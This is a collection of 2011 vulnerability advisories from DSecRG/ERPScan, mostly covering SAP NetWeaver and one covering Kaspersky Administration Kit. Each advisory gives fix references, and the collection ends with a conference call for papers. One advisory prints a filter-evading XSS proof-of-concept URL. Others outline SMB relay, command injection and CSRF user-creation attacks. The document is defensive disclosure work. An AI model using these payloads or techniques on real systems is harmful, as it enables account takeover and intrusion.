from:"Alexandr Polyakov"

[DSECRG-11-031] SAP RFC EPS_DELETE_FILE - Authorisation bypass, smbrelay

Security vulnerability was founded in sap EPS_DELETE_FILE RFC function allows 
attacker to delete files remotely or steal hashes of SAP server account in 
windows environment using SMBRelay attack.


Digital Security Research Group [DSecRG] Advisory (Internal #DSECRG-00195)

Application: SAP NetWeaver ABAP 
Versions Affected: SAP NetWeaver ABAP 
Vendor URL: www.sap.com
Bugs: Auth bypass, directory traversal, smbrelay
Exploits: YES
Reported:15.01.2011
Vendor response: 25.01.2011
Date of Public Advisory:22.08.2011 
CVE-number: 
Author: Alexey Sintsov from DSecRG (ERPScan subdivision)

Description
***

Security vulnerability was founded in sap EPS_DELETE_FILE RFC function allows 
attacker to delete files remotely or steal hashes of SAP server account in 
windows environment using SMBRelay attack.

Details
***
Attacker that can execute function EPS_DELETE_FILE remotely using default SAP 
accounts like TMSADM or SAPCPIC to delete any file in OS or send hashes of SAP 
account to remote host or conduct smbrelay attack.

Example:
**
Working exploit will be available in commercial scanner ERPScan Security 
Scanner for SAP (http://erpscan.com) and also in ERPScan pentesting tool.

References
**
http://dsecrg.com/pages/vul/show.php?id=331
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1554030


Fix Information
*
Solution to this issue is given in the SAP Security Note 1554030.


About DSecRG
***
The main mission of DSecRG is to conduct researches of business critical 
systems such as ERP, CRM, SRM, BI, SCADA, banking software and others. The 
result of this work is then integrates in ERPScan Security Scanner. Being on 
the top edge of ERP and SAP security DSecRG research helps to improve a quality 
of ERPScan consulting services and protects you from the latest threads. 
Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com 

About ERPScan
***
ERPScan is an innovative company engaged in the research of ERP security and 
develops products for ERP system security assessment. Apart from this the 
company renders consulting services for secure configuration, development and 
implementation of ERP systems, and conducts comprehensive assessments and 
penetration testing of custom solutions.
Our flagship products are ERPScan Security Scanner for SAP and service 
ERPScan Online which can help customers to perform automated security 
assessments and compliance checks for SAP solutions.

Contact: info [at] erpscan [dot] com

Polyakov Alexander
CTO ERPScan
Head of DSecRG
__
phone:  +7 812 703 1547
+7 812 430 9130
e-mail: a.polya...@erpscan.com

www.erpscan.com
www.dsecrg.com


---
This message and any attachment are confidential and may be privileged or 
otherwise protected 
from disclosure. If you are not the intended recipient any use, distribution, 
copying or disclosure 
is strictly prohibited. If you have received this message in error, please 
notify the sender immediately 
either by telephone or by e-mail and delete this message and any attachment 
from your system. Correspondence 
via e-mail is for information purposes only. Digital Security neither makes nor 
accepts legally binding 
statements by e-mail unless otherwise agreed. 
---

[DSECRG-11-032] SAP NetWeaver ipcpricing - information disclose


[DSECRG-11-032] SAP NetWeaver ipcpricing - information disclose 

com.sap.ipc.webapp.ipcpricing application has information disclose 
vulnerability 


Digital Security Research Group [DSecRG] Advisory DSECRG-11-032 (Internal 
DSecRG-00197)

Application: SAP NetWeaver 
Versions Affected:   SAP NetWeaver 
Vendor URL:  http://www.SAP.com
Bugs:Information disclosure
Exploits:YES
Reported:27.01.2011
Vendor response: 28.01.2011
Date of Public Advisory:15.09.2011
CVE-number: 
Author:  Dmitriy Chastuchin from Digital Security Research Group [DSecRG] 
(research [at] dsecrg [dot] com)


Description
***

com.sap.ipc.webapp.ipcpricing application has information disclose 
vulnerability 


Details
***

Will be disclosed at Brucon 

Example:
**
Working exploit will be available in commercial scanner ERPScan Security 
Scanner for SAP (http://erpscan.com) and also in ERPScan pentesting tool.

References
**
http://dsecrg.com/pages/vul/show.php?id=332
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1545883



Fix Information
*
Solution to this issue is given in the SAP Security Note  1545883.


About DSecRG
***
The main mission of DSecRG is to conduct researches of business critical 
systems such as ERP, CRM, SRM, BI, SCADA, banking software and others. The 
result of this work is then integrates in ERPScan Security Scanner. Being on 
the top edge of ERP and SAP security DSecRG research helps to improve a quality 
of ERPScan consulting services and protects you from the latest threads. 
Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com 

About ERPScan
***
ERPScan is an innovative company engaged in the research of ERP security and 
develops products for ERP system security assessment. Apart from this the 
company renders consulting services for secure configuration, development and 
implementation of ERP systems, and conducts comprehensive assessments and 
penetration testing of custom solutions.
Our flagship products are ERPScan Security Scanner for SAP and service 
ERPScan Online which can help customers to perform automated security 
assessments and compliance checks for SAP solutions.

Contact: info [at] erpscan [dot] com




Polyakov Alexander
CTO ERPScan
Head of DSecRG
__
phone:  +7 812 703 1547
+7 812 430 9130
e-mail: a.polya...@erpscan.com

www.erpscan.com
www.dsecrg.com


---
This message and any attachment are confidential and may be privileged or 
otherwise protected 
from disclosure. If you are not the intended recipient any use, distribution, 
copying or disclosure 
is strictly prohibited. If you have received this message in error, please 
notify the sender immediately 
either by telephone or by e-mail and delete this message and any attachment 
from your system. Correspondence 
via e-mail is for information purposes only. Digital Security neither makes nor 
accepts legally binding 
statements by e-mail unless otherwise agreed. 
---

[DSECRG-11-034] SAP NetWeaver J2EE MeSync – information disclose

[DSECRG-11-034] SAP NetWeaver J2EE MeSync – information disclose

Attacker can get information about mobile engine version and sometimes the name 
of the technical user. 

Application: SAP NetWeaver 
Versions Affected:   SAP NetWeaver MI 2
Vendor URL:  http://www.SAP.com
Bugs:information disclosure
Reported:29.07.2011
Vendor response: 30.07.2011
Date of Public Advisory:11.11.2011
CVSS:   
CVE-number: 
Author:  Alexander Polyakov from DSecRG (research center of ERPScan)

Description
***
Attacker can get information about mobile engine version and sometimes the name 
of the technical user. 

Details
***
Information disclosure vulnerability was founded in SAP NetWeaver Mobile Engine 
which can help attacker to find information about installed version and patch 
for NetWeaver and also get username.

Example:
**
Working exploit is available in commercial scanner ERPScan Security Scanner for 
SAP (http://erpscan.com) 

References
**
http://dsecrg.com/pages/vul/show.php?id=334





Fix Information
*
This SatFileReceiver servlet is not 
shipped with MI 2. 7.02 or 7.31.It was used in MI 2.1 which is no longer 
supported.

You should disable this application

About DSecRG
***
The main mission of DSecRG is to conduct researches of business critical 
systems such as ERP, CRM, SRM, BI, SCADA, banking software and others. The 
result of this work is then integrates in ERPScan Security Scanner. Being on 
the top edge of ERP and SAP security DSecRG research helps to improve a quality 
of ERPScan consulting services and protects you from the latest threads. 
Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com 

About ERPScan
***
ERPScan is an innovative company engaged in the research of ERP security and 
develops products for ERP system security assessment. Apart from this the 
company renders consulting services for secure configuration, development and 
implementation of ERP systems, and conducts comprehensive assessments and 
penetration testing of custom solutions.
Our flagship products are ERPScan Security Scanner for SAP and service 
ERPScan Online which can help customers to perform automated security 
assessments and compliance checks for SAP solutions.

Contact: info [at] erpscan [dot] com
http://www.erpscan.com





Polyakov Alexander
CTO ERPScan
Head of DSecRG
__
phone:  +7 812 703 1547
+7 812 430 9130
e-mail: a.polya...@erpscan.com

www.erpscan.com
www.dsecrg.com


---
This message and any attachment are confidential and may be privileged or 
otherwise protected 
from disclosure. If you are not the intended recipient any use, distribution, 
copying or disclosure 
is strictly prohibited. If you have received this message in error, please 
notify the sender immediately 
either by telephone or by e-mail and delete this message and any attachment 
from your system. Correspondence 
via e-mail is for information purposes only. Digital Security neither makes nor 
accepts legally binding 
statements by e-mail unless otherwise agreed. 
---

[DSECRG-11-037] SAP BW Doc - Multiple XSS

[DSECRG-11-037] SAP BW Doc - Multiple XSS

BW DOC metadata application in SAP NetWeaver is vulnerable to XSS attack. 

Application: SAP NetWeaver 
Versions Affected:   SAP NetWeaver 
Vendor URL:  http://www.SAP.com
Bugs:XSS
Reported:14.03.2011
Vendor response: 16.03.2011
Date of Public Advisory:11.11.2011
CVSS:4.3
CVE-number: 
Author:  Alexandr Polyakov and Dmitriy Chastuchin from DSecRG (research center 
of ERPScan)

Description
***
BW DOC metadata in SAP NetWeaver is vulnerable to XSS attack.

Details
***
XSS found in page /SAP/BW/DOC/METADATA/
Vulnerable parameter - page
To avoid XSS protection we use base64 encoding and DATA tag 

Example:
**

http://[SAPSERVER]/SAP/BW/DOC/METADATA/?page=%3Cobject%20data=%22data:text/html;
base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=%22%3E%3C/object%3E

References
**
http://erpscan.com/advisories/dsecrg-11-037-sap-bw-doc-multiple-xss/
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1572325






Fix Information
*
Solution to this issue is given in the SAP Security Note 1572325.


About DSecRG
***
The main mission of DSecRG is to conduct researches of business critical 
systems such as ERP, CRM, SRM, BI, SCADA, banking software and others. The 
result of this work is then integrates in ERPScan Security Scanner. Being on 
the top edge of ERP and SAP security DSecRG research helps to improve a quality 
of ERPScan consulting services and protects you from the latest threads. 
Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com 

About ERPScan
***
ERPScan is an innovative company engaged in the research of ERP security and 
develops products for ERP system security assessment. Apart from this the 
company renders consulting services for secure configuration, development and 
implementation of ERP systems, and conducts comprehensive assessments and 
penetration testing of custom solutions.
Our flagship products are ERPScan Security Scanner for SAP and service 
ERPScan Online which can help customers to perform automated security 
assessments and compliance checks for SAP solutions.

Contact: info [at] erpscan [dot] com
http://www.erpscan.com 





Polyakov Alexander
CTO ERPScan
Head of DSecRG
__
phone:  +7 812 703 1547
+7 812 430 9130
e-mail: a.polya...@erpscan.com

www.erpscan.com
www.dsecrg.com


---
This message and any attachment are confidential and may be privileged or 
otherwise protected 
from disclosure. If you are not the intended recipient any use, distribution, 
copying or disclosure 
is strictly prohibited. If you have received this message in error, please 
notify the sender immediately 
either by telephone or by e-mail and delete this message and any attachment 
from your system. Correspondence 
via e-mail is for information purposes only. Digital Security neither makes nor 
accepts legally binding 
statements by e-mail unless otherwise agreed. 
---

[DSECRG-11-038] SAP RSTXSCRP report - smb relay vulnerability



[DSECRG-11-038] SAP RSTXSCRP report - smb relay vulnerability 

SAP RSTXSCRP Report has path traversal vulnerability which can lead to SMB 
relay attack and full control on system. 

Application: SAP NetWeaver 
Versions Affected:   SAP NetWeaver 
Vendor URL:  http://www.SAP.com
Bugs:Path traversal, SMBRelay
Reported:14.03.2011
Vendor response: 16.03.2011
Date of Public Advisory:11.11.2011
CVSS:2.1
CVE-number: 
Author:  Dmitriy Chastuchin from DSecRG (research center of ERPScan)

Description
***
SAP RSTXSCRP Report has path traversal vulnerability which can lead to SMB 
relay attack and full control on system.
Details
***
Using transaction sa38 and report RSTXSCRP attacker can insert malicious 
UNC path in File Name field and chose radio button From/on application 
server
For successful SMB Relay attack realization attacker should enforce to initiate 
SMB session on attacker server via UNC path request. SMB client will try to 
access a remote SMB service on an attacker's machine. 

Example:
**
Working exploit is available in commercial scanner ERPScan Security Scanner for 
SAP (http://erpscan.com)

References
**
http://erpscan.com/advisories/dsecrg-11-038-sap-rstxscrp-report-smb-relay-vulnerability/
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1583286




Fix Information
*
Solution to this issue is given in the SAP Security Note 1583286.


About DSecRG
***
The main mission of DSecRG is to conduct researches of business critical 
systems such as ERP, CRM, SRM, BI, SCADA, banking software and others. The 
result of this work is then integrates in ERPScan Security Scanner. Being on 
the top edge of ERP and SAP security DSecRG research helps to improve a quality 
of ERPScan consulting services and protects you from the latest threads. 
Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com 

About ERPScan
***
ERPScan is an innovative company engaged in the research of ERP security and 
develops products for ERP system security assessment. Apart from this the 
company renders consulting services for secure configuration, development and 
implementation of ERP systems, and conducts comprehensive assessments and 
penetration testing of custom solutions.
Our flagship products are ERPScan Security Scanner for SAP and service 
ERPScan Online which can help customers to perform automated security 
assessments and compliance checks for SAP solutions.

Contact: info [at] erpscan [dot] com
http://www.erpscan.com



Polyakov Alexander
CTO ERPScan
Head of DSecRG
__
phone:  +7 812 703 1547
+7 812 430 9130
e-mail: a.polya...@erpscan.com

www.erpscan.com
www.dsecrg.com


---
This message and any attachment are confidential and may be privileged or 
otherwise protected 
from disclosure. If you are not the intended recipient any use, distribution, 
copying or disclosure 
is strictly prohibited. If you have received this message in error, please 
notify the sender immediately 
either by telephone or by e-mail and delete this message and any attachment 
from your system. Correspondence 
via e-mail is for information purposes only. Digital Security neither makes nor 
accepts legally binding 
statements by e-mail unless otherwise agreed. 
---

[DSECRG-11-039] SAP NetWeaver TH_GREP module - Code injection vulnerability (NEW)



[DSECRG-11-039] SAP NetWeaver TH_GREP module - Code injection vulnerability 
(NEW) 

TH_GREP report is vulnerable for command execution vulnerability which is 
working with previous patch (note 1433101). Remote OS command execution is 
possible 

Application: SAP NetWeaver 
Versions Affected:   SAP NetWeaver 
Vendor URL:  http://www.SAP.com
Bugs:Command execution
Reported:08.04.2011
Vendor response: 09.04.2011
Date of Public Advisory:11.11.2011
CVSS:6.0
CVE-number: 
Author:  Alexey Tyurin from DSecRG (research center of ERPScan)

Description
***
TH_GREP report is vulnerable for command execution vulnerability which is 
working with previous patch (note 1433101). Remote OS command execution is 
possible

Details
***
This vulnerability exists in patched version (note 1433101) because this note 
secure only linux but we found that windows is vulnerable too.
There is ability for command execution via SA TH_GREP RFC-function in OS 
Windows.
The problem contains in user input validation absence of TH_GREP 
RFC-function's parameters. An attacker can insert malicious code in 
STRING-parameter for command execution.
There are minimum 3 ways of command execution and attacker must have valid 
credentials:
1) In transaction Se37
2) via startrfc command with TH_GREP RFC-function
3) via a crafted TH_GREP RFC-SOAP-request

Example:
**
Working exploit is available in commercial scanner ERPScan Security Scanner for 
SAP (http://erpscan.com)

References
**
http://erpscan.com/advisories/dsecrg-11-039-sap-netweaver-th_grep-module-code-injection-vulnerability-new/
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1580017




Fix Information
*
Solution to this issue is given in the SAP Security Note 1580017.


About DSecRG
***
The main mission of DSecRG is to conduct researches of business critical 
systems such as ERP, CRM, SRM, BI, SCADA, banking software and others. The 
result of this work is then integrates in ERPScan Security Scanner. Being on 
the top edge of ERP and SAP security DSecRG research helps to improve a quality 
of ERPScan consulting services and protects you from the latest threads. 
Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com 

About ERPScan
***
ERPScan is an innovative company engaged in the research of ERP security and 
develops products for ERP system security assessment. Apart from this the 
company renders consulting services for secure configuration, development and 
implementation of ERP systems, and conducts comprehensive assessments and 
penetration testing of custom solutions.
Our flagship products are ERPScan Security Scanner for SAP and service 
ERPScan Online which can help customers to perform automated security 
assessments and compliance checks for SAP solutions.

Contact: info [at] erpscan [dot] com
http://www.erpscan.com 



Polyakov Alexander
CTO ERPScan
Head of DSecRG
__
phone:  +7 812 703 1547
+7 812 430 9130
e-mail: a.polya...@erpscan.com

www.erpscan.com
www.dsecrg.com


---
This message and any attachment are confidential and may be privileged or 
otherwise protected 
from disclosure. If you are not the intended recipient any use, distribution, 
copying or disclosure 
is strictly prohibited. If you have received this message in error, please 
notify the sender immediately 
either by telephone or by e-mail and delete this message and any attachment 
from your system. Correspondence 
via e-mail is for information purposes only. Digital Security neither makes nor 
accepts legally binding 
statements by e-mail unless otherwise agreed. 
---

[DSECRG-11-040] SAP NetWeaver SPML - XML CSRF user creation



[DSECRG-11-040] SAP NetWeaver SPML - XML CSRF user creation 

Attacker can create a new user in J2EE Engine using CSRF attack on SPML 
service. 

Application: SAP NetWeaver 
Versions Affected:   SAP NetWeaver 
Vendor URL:  http://www.SAP.com
Bugs:CSRF
Reported:14.03.2011
Vendor response: 15.03.2011
Date of Public Advisory:11.11.2011
CVSS:7.3
CVE-number: 
Author:  Alexandr Polyakov from DSecRG (research center of ERPScan)

Description
***
Attacker can create a new user in J2EE Engine using CSRF attack on SPML service
Details
***
SPML service can be used to make various actions including user management, 
role management etc.
Attacker can generate HTTP page with XML call to SPML service and send a link 
to administrator.
Example:
**
Working exploit is available in commercial scanner ERPScan Security Scanner for 
SAP (http://erpscan.com)

References
**
http://erpscan.com/advisories/dsecrg-11-040-sap-netweaver-spml-xml-csrf-user-creation/
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1616058
http://erpscan.com/wp-content/uploads/2011/08/A-crushing-blow-at-the-heart-SAP-J2EE-engine_whitepaper.pdf





Fix Information
*
Solution to this issue is given in the SAP Security Note 1616058


About DSecRG
***
The main mission of DSecRG is to conduct researches of business critical 
systems such as ERP, CRM, SRM, BI, SCADA, banking software and others. The 
result of this work is then integrates in ERPScan Security Scanner. Being on 
the top edge of ERP and SAP security DSecRG research helps to improve a quality 
of ERPScan consulting services and protects you from the latest threads. 
Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com 

About ERPScan
***
ERPScan is an innovative company engaged in the research of ERP security and 
develops products for ERP system security assessment. Apart from this the 
company renders consulting services for secure configuration, development and 
implementation of ERP systems, and conducts comprehensive assessments and 
penetration testing of custom solutions.
Our flagship products are ERPScan Security Scanner for SAP and service 
ERPScan Online which can help customers to perform automated security 
assessments and compliance checks for SAP solutions.

Contact: info [at] erpscan [dot] com
http://www.erpscan.com 






Polyakov Alexander
CTO ERPScan
Head of DSecRG
__
phone:  +7 812 703 1547
+7 812 430 9130
e-mail: a.polya...@erpscan.com

www.erpscan.com
www.dsecrg.com


---
This message and any attachment are confidential and may be privileged or 
otherwise protected 
from disclosure. If you are not the intended recipient any use, distribution, 
copying or disclosure 
is strictly prohibited. If you have received this message in error, please 
notify the sender immediately 
either by telephone or by e-mail and delete this message and any attachment 
from your system. Correspondence 
via e-mail is for information purposes only. Digital Security neither makes nor 
accepts legally binding 
statements by e-mail unless otherwise agreed. 
---

[DSECRG-11-041] SAP NetWeaver - Authentication bypass (Verb Tampering)


[DSECRG-11-041] SAP NetWeaver - Authentication bypass (Verb Tampering) 

Authentication bypass vulnerability in SAP NetWeaver CTC service can be 
exploited for unauthorized user management and OS command execution. 

Application: SAP NetWeaver 
Versions Affected:   SAP NetWeaver 
Vendor URL:  http://www.SAP.com
Bugs:Auth bypass, Verb tampering
Reported:14.03.2011
Vendor response: 15.03.2011
Date of Public Advisory:11.11.2011
CVSS:7.3 by SAP (10 by ERPSCAN)
CVE-number: 
Author:  Alexandr Polyakov from DSecRG (research center of ERPScan)

Description
***
Authentication bypass vulnerability in SAP NetWeaver CTC service can be 
exploited for unauthorized user management and OS command execution.
Details
***
Attacker can bypass Authentication using Verb Tampering vulnerability

Example:
**
Working exploit is available in commercial scanner ERPScan Security Scanner for 
SAP (http://erpscan.com)

References
**
http://erpscan.com/advisories/dsecrg-11-041-sap-netweaver-authentication-bypass-verb-tampering/
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1589525
http://erpscan.com/wp-content/uploads/2011/08/A-crushing-blow-at-the-heart-SAP-J2EE-engine_whitepaper.pdf




Fix Information
*
Solution to this issue is given in the SAP Security Note 1589525, 1624450



About DSecRG
***
The main mission of DSecRG is to conduct researches of business critical 
systems such as ERP, CRM, SRM, BI, SCADA, banking software and others. The 
result of this work is then integrates in ERPScan Security Scanner. Being on 
the top edge of ERP and SAP security DSecRG research helps to improve a quality 
of ERPScan consulting services and protects you from the latest threads. 
Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com 

About ERPScan
***
ERPScan is an innovative company engaged in the research of ERP security and 
develops products for ERP system security assessment. Apart from this the 
company renders consulting services for secure configuration, development and 
implementation of ERP systems, and conducts comprehensive assessments and 
penetration testing of custom solutions.
Our flagship products are ERPScan Security Scanner for SAP and service 
ERPScan Online which can help customers to perform automated security 
assessments and compliance checks for SAP solutions.

Contact: info [at] erpscan [dot] com
http://www.erpscan.com 





Polyakov Alexander
CTO ERPScan
Head of DSecRG
__
phone:  +7 812 703 1547
+7 812 430 9130
e-mail: a.polya...@erpscan.com

www.erpscan.com
www.dsecrg.com


---
This message and any attachment are confidential and may be privileged or 
otherwise protected 
from disclosure. If you are not the intended recipient any use, distribution, 
copying or disclosure 
is strictly prohibited. If you have received this message in error, please 
notify the sender immediately 
either by telephone or by e-mail and delete this message and any attachment 
from your system. Correspondence 
via e-mail is for information purposes only. Digital Security neither makes nor 
accepts legally binding 
statements by e-mail unless otherwise agreed. 
---

[DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability

[DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability

XSS vulnerability found in pubDBLogon.jsp page of SAP Crystal Report Server
2008.

Application: SAP Crystal Report Server 2008
Versions Affected: SAP Crystal Report Server 2008
Vendor URL: http://www.sap.com
Bugs: Linked XSS Vulnerability
Exploits: YES
Reported: 09.12.2010
Vendor response: 10.12.2010
Date of Public Advisory: 15.09.2011
Authors: Dmitry Chastuhin

Description

SAP Crystal Report Server 2008 contains a variety of features with which users
can manage and share interactive reports and dashboards, as well as provide
access to them via the Internet.

Details
**
Vulnerability discovered in JSP – page pubDBLogon.jsp Vulnerable parameter -
service .
Any user can cheat a vulnerable link and steal user's or Administrator's cookie.

References
**
http://dsecrg.com/pages/vul/show.php?id=333
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1562292

Fix Information
*
Solution to this issue is given in the SAP Security Note 1562292.

About DSecRG
***
The main mission of DSecRG is to conduct researches of business critical
systems such as ERP, CRM, SRM, BI, SCADA, banking software and others. The
result of this work is then integrates in ERPScan Security Scanner. Being on
the top edge of ERP and SAP security DSecRG research helps to improve a quality
of ERPScan consulting services and protects you from the latest threads.
Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com

About ERPScan
***
ERPScan is an innovative company engaged in the research of ERP security and
develops products for ERP system security assessment. Apart from this the
company renders consulting services for secure configuration, development and
implementation of ERP systems, and conducts comprehensive assessments and
penetration testing of custom solutions.
Our flagship products are ERPScan Security Scanner for SAP and service
ERPScan Online which can help customers to perform automated security
assessments and compliance checks for SAP solutions.

Contact: info [at] erpscan [dot] com

Polyakov Alexander
CTO ERPScan
Head of DSecRG
__
phone: +7 812 703 1547
+7 812 430 9130
e-mail: a.polya...@erpscan.com

www.erpscan.com
www.dsecrg.com

---
This message and any attachment are confidential and may be privileged or
otherwise protected
from disclosure. If you are not the intended recipient any use, distribution,
copying or disclosure
is strictly prohibited. If you have received this message in error, please
notify the sender immediately
either by telephone or by e-mail and delete this message and any attachment
from your system. Correspondence
via e-mail is for information purposes only. Digital Security neither makes nor
accepts legally binding
statements by e-mail unless otherwise agreed.
---

CFP for first independent international Security Conference in Russia - ZeroNights (by Defcon-Russia)

2011-09-16 Thread Alexandr Polyakov



http://zeronights.org/request

Saint-Petersburg, Russia, 25th of November
CFP consist of 2 steps

Participation requests admission of the first step is till 20.09.11
Program committee decision about the first part of speakers will be available 
on the 30.09.11

Participation requests admission of the second step is till 20.10.11
Final program committee decision will be available on the 30.10.11

The requests should be sent to c...@zeronights.ru.

The reporters request must consist of:

Name and surname
E-mail
Biografy (in short)
Job, position
Residence
Report name
Brief description of presentation (not more than 500 words, this is description 
for web-site)
Full description (technical details):
if there are 0-day vulnerabilities description
if any tools will be presented at the conference
Topic status (if it was previously shown/published, if yes – when and where)
Personal requirements for presentation
We are highly interested in the following topics:

Corporative applications security
Security of applications and services operating with financial funds
State projects security
SCADA security
Communication systems security
Russian software security
Mobile devices security
Malicious software
Social networks and WEB 2.0 hacking
Program researching without sources
Vulnerability searching and exploiting
Software, hardware and networks researching
This topic list is not full but preferable. Presentations on other subjects can 
be considered as well.

We do not accept marketing talks or talks aimed to any products sales without 
technical information.

Slides/talk must be presented in Russian or English.

As a speaker, you will receive a partial refund of your travel expenses

Good mood, pleasant community and a lot of unforgettable feelings in the north 
capital of Russia are guaranteed.





Polyakov Alexander. QSA,PA-QSA
CTO ERPScan
Head of DSecRG
__
phone:  +7 812 703 1547
+7 812 430 9130
e-mail: a.polya...@erpscan.com

www.erpscan.com
www.dsecrg.com


---
This message and any attachment are confidential and may be privileged or 
otherwise protected 
from disclosure. If you are not the intended recipient any use, distribution, 
copying or disclosure 
is strictly prohibited. If you have received this message in error, please 
notify the sender immediately 
either by telephone or by e-mail and delete this message and any attachment 
from your system. Correspondence 
via e-mail is for information purposes only. Digital Security neither makes nor 
accepts legally binding 
statements by e-mail unless otherwise agreed. 
---

[DSECRG-11-032] SAP NetWeaver ipcpricing - information disclose (by ERPScan)

2011-09-16 Thread Alexandr Polyakov

[DSECRG-11-032] SAP NetWeaver ipcpricing - information disclose

com.sap.ipc.webapp.ipcpricing application has information disclose vulnerability


Digital Security Research Group [DSecRG] Advisory DSECRG-11-032 (Internal 
DSecRG-00197)

Application: SAP NetWeaver
Versions Affected: SAP NetWeaver
Vendor URL: http://www.SAP.com
Bugs: Information disclosure
Exploits: YES
Reported: 27.01.2011
Vendor response: 28.01.2011
Date of Public Advisory: 15.09.2011
CVE-number:
Author: Dmitriy Chastuchin from DSecRG (subdivision of ERPScan)


Description
***

com.sap.ipc.webapp.ipcpricing application has information disclose vulnerability


Details
***

Will be disclosed at Brucon

Example:
**
Working exploit will be available in commercial scanner ERPScan Security 
Scanner for SAP (http://erpscan.com) and also in ERPScan pentesting tool.

References
**
http://erpscan.com/advisories/dsecrg-11-032-sap-netweaver-ipcpricing-information-disclose/
http://dsecrg.com/pages/vul/show.php?id=332
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1545883



Fix Information
*
Solution to this issue is given in the SAP Security Note  1545883.


About DSecRG
***
The main mission of DSecRG is to conduct researches of business critical 
systems such as ERP, CRM, SRM, BI, SCADA, banking software and others. The 
result of this work is then integrates in ERPScan Security Scanner. Being on 
the top edge of ERP and SAP security DSecRG research helps to improve a quality 
of ERPScan consulting services and protects you from the latest threads.
Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com

About ERPScan
***
ERPScan is an innovative company engaged in the research of ERP security and 
develops products for ERP system security assessment. Apart from this the 
company renders consulting services for secure configuration, development and 
implementation of ERP systems, and conducts comprehensive assessments and 
penetration testing of custom solutions.
Our flagship products are ERPScan Security Scanner for SAP and service 
ERPScan Online which can help customers to perform automated security 
assessments and compliance checks for SAP solutions.

Contact: info [at] erpscan [dot] com





Polyakov Alexander. QSA,PA-QSA
CTO ERPScan
Head of DSecRG
__
phone:  +7 812 703 1547
+7 812 430 9130
e-mail: a.polya...@erpscan.com

www.erpscan.com
www.dsecrg.com


---
This message and any attachment are confidential and may be privileged or 
otherwise protected 
from disclosure. If you are not the intended recipient any use, distribution, 
copying or disclosure 
is strictly prohibited. If you have received this message in error, please 
notify the sender immediately 
either by telephone or by e-mail and delete this message and any attachment 
from your system. Correspondence 
via e-mail is for information purposes only. Digital Security neither makes nor 
accepts legally binding 
statements by e-mail unless otherwise agreed. 
---

[DSECRG-11-018] Kaspersky administration Kit - Remote code execution via SMBRelay

2011-04-25 Thread Alexandr Polyakov



Digital Security Research Group [DSecRG] Advisory   #DSECRG-11-018

Application: Kaspersky Administration Kit
Versions Affected:   from 6.0
Vendor URL:  http://www.kaspersky.com
Bug: Design flaw
Exploits:YES
Reported:22.01.2011
Vendor response: 22.01.2011
Solution:disable IP scan
Date of Public Advisory: 14.03.2011
Authors: Alexey Sintsov of Digital Security Research Group 
[DSecRG]



Description
***

Service account used for Kaspersky Administration Kit and it functional make 
possible attack on other hosts
in a corporate network.

Details
***

Functional called Scan IP subnets is enabled by default in Kaspersky 
Administration Kit 6.
This function makes ICMP scan and also tries to use SMB protocol by using 
service account which can be
used to run SMBrelay attack and gain full control on secured network. By 
default Scan IP subnets 
scans  subnet every 7 hours. Attacker just needs to run SMBRelay tool and wait. 
Attack is possible
because  Kaspersky service account have Administrative rights on hosts in 
corporate network. 
It's mean that attacker can attack any server or workstation where this service 
account has rights. 

Fix Information
***

1) Do not start Administration Server service under a Domain Administrator 
account
or a domain account member of local administrators group on other hosts.
2) Disable Scan IP subnets


http://support.kaspersky.com/faq/?qid=208284121 


References
*

http://dsecrg.ru/pages/vul/show.php?id=318
http://dsecrg.blogspot.com/2011/03/smbrelay-bible-4-smbrelay-with-no.html

About DSecRG
***
The main mission of DSecRG is to conduct researches of business critical 
systems such as ERP, CRM, SRM, BI, SCADA, banking software and others. The 
result of this work is then integrates in ERPSCAN security scanner. Being on 
the top edge of ERP and SAP security DSecRG research helps to improve a quality 
of ERPSCAN consulting services and protects you from the latest threads. 
Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com 

About ERPScan
***
ERPScan is an innovative company engaged in the research of ERP security and 
develops products for ERP system security assessment. Apart from this the 
company renders consulting services for secure configuration, development and 
implementation of ERP systems, and conducts comprehensive assessments and 
penetration testing of custom solutions.
Our flagship products are ERPScan Security Scanner for SAP and service 
ERPScan Online which can help customers to perform automated security 
assessments and compliance checks for SAP solutions.

“ERPScan Security Scanner for SAP” is an innovative product for integrated 
assessment of SAP platform security and standard compliance.

Contact: info [at] erpscan [dot] com
http://www.erpscan.com




Polyakov Alexandr. PCI QSA,PA-QSA
CTO Digital Security
Head of DSecRG
__
DIGITAL SECURITY
phone:  +7 812 703 1547
+7 812 430 9130
e-mail: a.polya...@dsec.ru  

www.dsec.ru
